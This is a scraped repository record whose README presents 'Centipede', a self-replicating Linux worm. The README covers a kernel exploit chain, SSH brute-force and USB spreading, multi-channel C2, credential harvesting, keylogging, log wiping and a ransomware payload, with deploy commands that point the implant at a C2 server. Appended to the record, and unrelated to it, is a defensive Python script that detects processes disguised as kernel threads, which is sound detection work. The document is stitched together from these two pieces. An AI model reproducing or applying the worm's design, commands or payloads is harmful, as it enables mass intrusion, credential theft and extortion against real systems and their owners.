[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-81725":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":15,"stars7d":16,"stars30d":17,"stars90d":14,"forks30d":14,"starsTrendScore":18,"compositeScore":19,"rankGlobal":9,"rankLanguage":9,"license":20,"archived":21,"fork":21,"defaultBranch":22,"hasWiki":23,"hasPages":21,"topics":24,"createdAt":9,"pushedAt":9,"updatedAt":25,"readmeContent":26,"aiSummary":27,"trendingCount":14,"starSnapshotCount":14,"syncStatus":28,"lastSyncTime":29,"discoverSource":30},81725,"Centipede","ekomsSavior\u002FCentipede","ekomsSavior","Self-replicating Linux worm with multi-layer C2 coms",null,"Go",44,12,35,0,1,4,9,3,48.24,"MIT License",false,"main",true,[],"2026-06-12 04:01:35","# Centipede | churchofmalware.org\n\nSelf-replicating Linux worm with multi-layer C2 communication, privilege escalation via kernel exploits, dark web command interface, Discord fallback, and a full payload suite for post-exploitation operations.\n\n**DISCLAIMER:** For authorized security testing and educational purposes only.\n\n\u003Cimg width=\"1536\" height=\"1024\" alt=\"worm2\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Fb6dd6bf8-0ffa-4048-959a-08878a160b67\" \u002F>\n\n```\ncentipede\u002F\n├── cmd\u002F\n│   ├── centipede\u002F          # Worm implant binary\n│   └── c2d\u002F               # C2 server daemon\n├── internal\u002F\n│   ├── scanner\u002F           # Network discovery and WiFi scanning\n│   ├── exploiter\u002F         # Kernel exploit delivery and LPE chaining\n│   ├── replicator\u002F        # Self-propagation across SSH, WiFi, USB, HTTP, SMB, CVE\n│   ├── c2\u002F                # Multi-layer C2 client with fallback\n│   ├── payloads\u002F          # Post-exploitation payload suite (13 
payloads)\n│   ├── sensor\u002F            # Environment fingerprinting and sandbox detection\n│   └── common\u002F            # Cryptographic and system utilities\n├── web\u002F                   # Dark web C2 dashboard\n│   ├── static\u002Fcss\u002F        # Dark theme stylesheet\n│   ├── static\u002Fjs\u002F         # Dashboard application logic\n│   └── templates\u002F         # HTML template\n├── Makefile\n└── README.md\n```\n\n## Architecture\n\n### Vulnerability Exploitation\n\nThe worm carries multiple kernel privilege escalation exploits that chain automatically:\n\n| Exploit | CVE | Kernel Range | Architectures | Notes |\n|---------|-----|--------------|---------------|-------|\n| **DirtyFrag** | CVE-2026-43284 + CVE-2026-43500 | 4.x - 6.x | x86_64, AARCH64 | IPsec ESP + RxRPC UAF chain. Original dirtyfrag implementation |\n| **Fragnesia** | CVE-2026-43284 + CVE-2026-43500 | 4.x - 6.x | x86_64, AARCH64 | Dirtyfrag variant with different memory layout and exploitation path. Covers cases where original dirtyfrag fails |\n| **Copy-Fail** | CVE-2026-31431 | 5.x - 6.x | x86_64, AARCH64 | AF_ALG\u002Falgif_aead page-cache write via splice primitive. Unified payload for both architectures (thanks Jakeswiz for extending architecture support for copyfail) |\n| **Dirty Pipe** | CVE-2022-0847 | 5.8 - 5.16 | x86_64, AARCH64 | Direct pipe write to overwrite read-only files |\n| **PwnKit** | CVE-2021-4034 | All | All | pkexec argument injection on any distribution with pkexec installed |\n| **GameOverlay** | CVE-2023-3269 | 5.x+ | x86_64, AARCH64 | Ubuntu overlayfs LPE |\n| **OverlayFS** | CVE-2023-2640 | 5.x+ | x86_64, AARCH64 | Additional Ubuntu overlayfs LPE vector |\n\nThe exploiter automatically detects kernel version, architecture (x86_64 or AARCH64), checks available kernel modules and capabilities, and chains exploits until root is obtained. DirtyFrag and Fragnesia run sequentially — if one fails due to kernel memory layout differences, the other may succeed. 
The unified Copy-Fail exploit includes both x86_64 and ARM64 payloads, making Centipede effective across cloud instances, Raspberry Pi botnets, and ARM-based servers.\n\n### CVE-Based Propagation\n\nOnce a host is compromised and root is achieved, the worm uses the same exploit chain as a propagation vector:\n\n1. Scanner discovers hosts on adjacent subnets (ARP sweep, TCP connect scan)\n2. For each discovered host with open ports, the replicator attempts to deliver the worm binary via:\n   - HTTP PUT upload (if port 80\u002F8080\u002F443 is open and accepts PUT)\n   - FTP anonymous upload (if port 21 allows anonymous write)\n   - SMB write to ADMIN$ or C$ shares (if port 445 is open)\n   - SSH key-based and password brute-force (if port 22 is open)\n3. Once the binary lands, it autonomously runs its LPE chain to escalate privileges\n4. The new compromised host continues scanning and spreading\n\nThis creates a self-sustaining propagation cycle independent of manual C2 intervention.\n\n### C2 Communication Layers\n\nFour fallback communication layers in priority order:\n\n1.  **WebSocket** — Encrypted bidirectional channel to C2 server. Primary communication method.\n2.  **DNS Tunnelling** — Commands and responses encoded in DNS TXT queries. Bypasses HTTP\u002FHTTPS filtering.\n3.  **Discord Bot** — C2 commands and results relayed through Discord via bot API.\n4.  **ICMP Tunnelling** — Data encoded in ICMP echo payload fields. Last-resort fallback.\n\nAll layers use end-to-end encryption with AES-GCM. The client automatically cycles through layers, falling back on connection failure and returning to higher-priority layers when connectivity is restored.\n\n### Self-Replication Vectors\n\n- **SSH Spread** — Harvests existing SSH keys from .ssh\u002F, known_hosts, and config. Copies binary and executes. 
Falls back to password brute-force with common credentials (root, admin, vagrant, ubuntu, pi, etc).\n- **WiFi Spread** — Scans for open WiFi networks using iw and nmcli, connects to discovered access points, and scans the new network for accessible hosts.\n- **USB Spread** — Detects writable removable media, copies binary with hidden attributes and autorun.inf.\n- **HTTP\u002FFTP\u002FSMB Spread** — Attempts worm delivery via HTTP PUT, FTP anonymous write, and SMB ADMIN$\u002FC$ shares.\n- **Lateral Movement** — SMB and WMI propagation for mixed environments.\n\n### C2 Server\n\nThe C2 daemon provides:\n- Dark web dashboard with real-time bot monitoring and activity feed\n- Live WebSocket streaming for bot event updates\n- Discord bot integration for command relay and result forwarding\n- RESTful API for programmatic control\n- Bot tagging and grouping for targeted command dispatch\n- Command queue with execution tracking\n\n### Payload Suite\n\n**DISCLAIMER:** For authorized security testing and educational purposes only.\n\n| Payload | Description |\n|---------|-------------|\n| reverse_shell | Spawn reverse or bind shell on target |\n| persist | Install via systemd, cron, .bashrc hooks, LD_PRELOAD |\n| harvest | Extract credentials: \u002Fetc\u002Fshadow, SSH keys, env vars, DB configs, cloud credentials, Kubernetes configs |\n| lateral | Inject SSH keys, scan known_hosts, discover orchestration infrastructure |\n| pivot | Enable IP forwarding, SOCKS proxy, NAT masquerade |\n| keylog | Capture keystrokes from input devices |\n| sniff | Capture network traffic via tcpdump |\n| enum | Full system enumeration: kernel, users, network, containers, cloud |\n| exfil | Exfiltrate binary and harvested data via HTTP POST |\n| wipe | Clear logs, history, journald, auditd, wtmp, randomize MAC |\n| selfdestruct | Remove all traces, delete binary, and exit |\n| ransomware | AES-256-GCM file encryption with operator-defined key. Key can be pre-set or auto-generated. 
Encrypts targeted file types across specified directories |\n| ransomware_decrypt | Decrypt .centipede files using the same key used for encryption. Restores original files and removes ransom notes |\n\n### Ransomware Payload\n\n**Disclaimer: extremely destructive!** You must have authorization before using this payload. Proceed carefully.\n\nThe ransomware payload provides operator-controlled file encryption:\n\n- **Key Management**: Operator provides a 32-byte (64 hex char) key via the `key` argument. If no key is provided, one is auto-generated and returned.\n- **File Selection**: Encrypts files by extension (documents, media, archives, databases, certificates, configs, source code, cloud configs). Targets directories specified in `dirs` argument (defaults to \u002Fhome, \u002Froot, \u002Fvar\u002Fwww, \u002Fetc, \u002Fopt, \u002Fsrv).\n- **Encryption**: AES-256-GCM per file with unique nonce. Encrypted files get .centipede extension appended.\n- **Ransom Note**: Written to each targeted directory root.\n- **Decryption**: ransomware_decrypt payload with the same key restores all files.\n- **Skip Protection**: Already-encrypted .centipede files are skipped.\n\nUsage via C2:\n```\n> ransomware key=\"\" dirs=\"\u002Fhome,\u002Froot\"\n> ransomware key=\"a1b2c3d4...\" dirs=\"\u002Fvar\u002Fwww\"\n> ransomware_decrypt key=\"a1b2c3d4...\"\n```\n\n## Quick Start\n\n### Build\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002FekomsSavior\u002FCentipede\ncd Centipede\nmake build\n```\n\n### Start C2 Server\n\n```\n.\u002Fbin\u002Fc2d -addr :8443\n```\n\nWith Discord relay:\n\n```\n.\u002Fbin\u002Fc2d -addr :8443 -discord-token \"YOUR_BOT_TOKEN\" -discord-channel \"CHANNEL_ID\"\n```\n\n### Deploy Worm\n\nWith direct C2 endpoint:\n\n```\n.\u002Fbin\u002Fcentipede -c2 ws:\u002F\u002FYOUR_C2_IP:8443\u002Fws\u002Fbot\n```\n\nWith all fallbacks:\n\n```\n.\u002Fbin\u002Fcentipede \\\n    -c2 ws:\u002F\u002FYOUR_C2_IP:8443\u002Fws\u002Fbot \\\n    -c2-dns c2.yourdomain.com \\\n    
-c2-discord-token \"TOKEN\" \\\n    -c2-discord-channel \"CHANNEL_ID\" \\\n    -c2-icmp YOUR_C2_IP\n```\n\n## C2 Dashboard\n\nAccess the dark web dashboard at `http:\u002F\u002FYOUR_C2_IP:8443\u002F`. The interface provides:\n\n- Real-time bot activity feed with live WebSocket streaming\n- Command dispatch to individual bots, tagged groups, or all bots\n- Payload selection and deployment with pre-configured options\n- Exploit status monitoring with CVE details and kernel ranges\n- Bot tagging and management\n\n## Configuration\n\nConfiguration file (`\u002Fetc\u002Fcentipede.conf`):\n\n```json\n{\n    \"c2_endpoint\": \"ws:\u002F\u002Fc2.example.com:8443\u002Fws\u002Fbot\",\n    \"c2_dns_domain\": \"c2.example.com\",\n    \"c2_discord_token\": \"YOUR_TOKEN\",\n    \"c2_discord_channel\": \"CHANNEL_ID\",\n    \"c2_icmp_target\": \"c2.example.com\",\n    \"scan_interval\": 300,\n    \"spread_interval\": 300,\n    \"exploit\": true,\n    \"replication\": true,\n    \"masquerade\": true\n}\n```\n\nCommand-line flags override config file values. The config file is read from \u002Fetc\u002Fcentipede.conf by default.\n\n## Exploit Chain\n\n**DISCLAIMER:** For authorized security testing and educational purposes only.\n\nThe exploit chain executes in order until root is obtained:\n\n1. **DirtyFrag** (CVE-2026-43284 + CVE-2026-43500) — Kernel 4.x through 6.x. IPsec ESP + RxRPC UAF chain. Primary exploitation path.\n2. **Fragnesia** (CVE-2026-43284 + CVE-2026-43500) — Kernel 4.x through 6.x. Dirtyfrag variant with different memory layout. Attempts when DirtyFrag fails due to kernel memory layout differences.\n3. **Copy-Fail** (CVE-2026-31431) — Kernel 5.x through 6.x with algif_aead module. Unified payload for x86_64 and AARCH64. Uses AF_ALG + splice primitive to corrupt \u002Fusr\u002Fbin\u002Fsu.\n4. **Dirty Pipe** (CVE-2022-0847) — Kernel 5.8 through 5.16.\n5. **PwnKit** (CVE-2021-4034) — Any distribution with pkexec installed.\n6. 
**GameOverlay** (CVE-2023-3269) — Ubuntu kernels with overlayfs.\n7. **OverlayFS** (CVE-2023-2640) — Ubuntu kernels with overlayfs.\n\nEach exploit checks its preconditions (module loaded, file exists, kernel version range, architecture compatibility) before attempting. Failures are non-fatal and the chain continues.\n\n## Detection Evasion\n\n- Sandbox environment detection before execution (CPU count, \u002Fproc\u002Fcpuinfo content)\n- Process name masquerading as kernel threads ([kworker\u002Fu256+0], [jbd2\u002Fdm-0-8], etc.)\n- Encrypted configuration blobs (no hardcoded strings in binary)\n- Forensic cleanup payload wipes shell history, system logs, journald, auditd, and login records\n- MAC address randomization on compromised hosts (root only)\n- Configurable sleep intervals with jitter\n\n## Credits\n\nBuilt by **ek0ms**\n\nSpecial thanks to the exploit research community, especially JakeSwiz https:\u002F\u002Fgithub.com\u002F0xXyc\u002F (0xXyc) for the AARCH64 port of Copy-Fail and contributions to the Fragnesia dirtyfrag variant: https:\u002F\u002Fgithub.com\u002Fv12-security\u002Fpocs\u002Ftree\u002Fmain\u002Ffragnesia\n","Centipede is a self-replicating Linux worm with multi-layer command-and-control communication. The project is written in Go; its core features include privilege escalation via kernel vulnerabilities, a multi-layer C2 mechanism (including a dark web command interface and a Discord fallback channel), and a full post-exploitation payload suite. It automatically detects the target environment and exploits a series of known vulnerabilities to obtain the highest privileges, and is intended for authorized security testing and educational purposes. Note that this project is for lawful security research and learning only.",2,"2026-06-11 04:06:09","CREATED_QUERY"]
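The README's "Detection Evasion" section says the implant renames itself to look like a kernel thread ([kworker/u256+0], [jbd2/dm-0-8]). That disguise is cheap to unmask from the defender's side, because real kernel threads obey invariants a renamed userland binary cannot: they are children of kthreadd (PID 2), their /proc/PID/cmdline is empty, /proc/PID/exe has no target, and their comm carries no brackets (the brackets in `ps` output are added by the tool because cmdline is empty). The following check is an added defensive example, not code from the Centipede project; the KTHREAD_NAME prefix list and the SAMPLE process records are constructed assumptions for illustration, not captured from a real host.

```python
"""
Flag userland processes masquerading as Linux kernel threads.

Invariants of a genuine kernel thread (other than kthreadd itself):
  * parent PID is 2 (kthreadd)
  * /proc/<pid>/cmdline is empty
  * /proc/<pid>/exe has no target (readlink fails)
  * /proc/<pid>/comm has no brackets, e.g. "kworker/u256:0"
A process renamed via prctl(PR_SET_NAME) or argv[0] breaks these.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumption: illustrative prefixes of common kernel thread names; extend
# for the kernels you actually run. The optional leading "[" catches a
# masquerader that baked the bracket into comm.
KTHREAD_NAME = re.compile(
    r"^\[?(kworker|kthreadd|ksoftirqd|migration|rcu_|jbd2|kswapd|kcompactd|"
    r"watchdog|cpuhp|khugepaged|kblockd|oom_reaper|kdevtmpfs|irq/)"
)
KTHREADD_PID = 2


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str            # /proc/<pid>/comm without the trailing newline
    cmdline: bytes       # raw /proc/<pid>/cmdline (NUL-separated argv)
    exe: Optional[str]   # target of /proc/<pid>/exe, None if it has none


def masquerade_reasons(p: Proc) -> List[str]:
    """Return the kernel-thread invariants this process violates ([] if none)."""
    reasons: List[str] = []
    if p.pid == KTHREADD_PID:
        return reasons                      # root of the kernel-thread tree
    if not KTHREAD_NAME.match(p.comm):
        return reasons                      # does not claim to be a kthread
    if p.comm.startswith("["):
        reasons.append("comm contains a literal bracket; kernel comm never does")
    if p.ppid != KTHREADD_PID:
        reasons.append(f"parent is PID {p.ppid}, not kthreadd (PID 2)")
    if p.cmdline:
        reasons.append("non-empty cmdline; kernel threads have none")
    if p.exe is not None:
        reasons.append(f"exe resolves to {p.exe}; kernel threads have no exe")
    return reasons


def read_proc(pid: int) -> Optional[Proc]:
    """Build a Proc record from /proc; None if the process disappeared."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/comm") as f:
            comm = f.read().rstrip("\n")
        with open(f"{base}/stat") as f:
            stat = f.read()
        with open(f"{base}/cmdline", "rb") as f:
            cmdline = f.read()
    except OSError:
        return None
    # /proc/<pid>/stat: "pid (comm) state ppid ..."; split after the last
    # ")" so a comm containing spaces or parentheses cannot shift fields.
    ppid = int(stat.rsplit(")", 1)[1].split()[1])
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:
        exe = None                          # kernel threads and zombies
    return Proc(pid, ppid, comm, cmdline, exe)


def scan_records(records: List[Proc]) -> Dict[int, List[str]]:
    """Map pid -> violated invariants for every suspicious record."""
    hits: Dict[int, List[str]] = {}
    for p in records:
        reasons = masquerade_reasons(p)
        if reasons:
            hits[p.pid] = reasons
    return hits


def scan_live() -> List[Tuple[int, str, List[str]]]:
    """Walk /proc on the running host and return (pid, comm, reasons) hits."""
    procs = [read_proc(int(n)) for n in os.listdir("/proc") if n.isdigit()]
    live = [p for p in procs if p is not None]
    found = scan_records(live)
    return [(p.pid, p.comm, found[p.pid]) for p in live if p.pid in found]


# Constructed sample records (assumption, not captured from a real host).
SAMPLE = [
    Proc(2,    0,    "kthreadd",         b"",                        None),
    Proc(17,   2,    "kworker/u256:0",   b"",                        None),
    Proc(4242, 1,    "[kworker/u256+0]", b"[kworker/u256+0]\0",      "/tmp/.x/implant"),
    Proc(4300, 4242, "jbd2/dm-0-8",      b"",                        "/usr/bin/python3"),
    Proc(900,  1,    "sshd",             b"/usr/sbin/sshd\0-D\0",    "/usr/sbin/sshd"),
]

if __name__ == "__main__":
    for pid, reasons in scan_records(SAMPLE).items():
        print(f"sample pid {pid}: {reasons}")
    for pid, comm, reasons in scan_live():
        print(f"live pid {pid} ({comm}): {reasons}")
```

Run it as root or as a user that can read /proc; in the constructed sample only PIDs 4242 and 4300 are flagged, the genuine kworker and kthreadd are not. A process that has also emptied its cmdline and unlinked its binary still fails the parent-PID check, since only the kernel can fork a child of kthreadd.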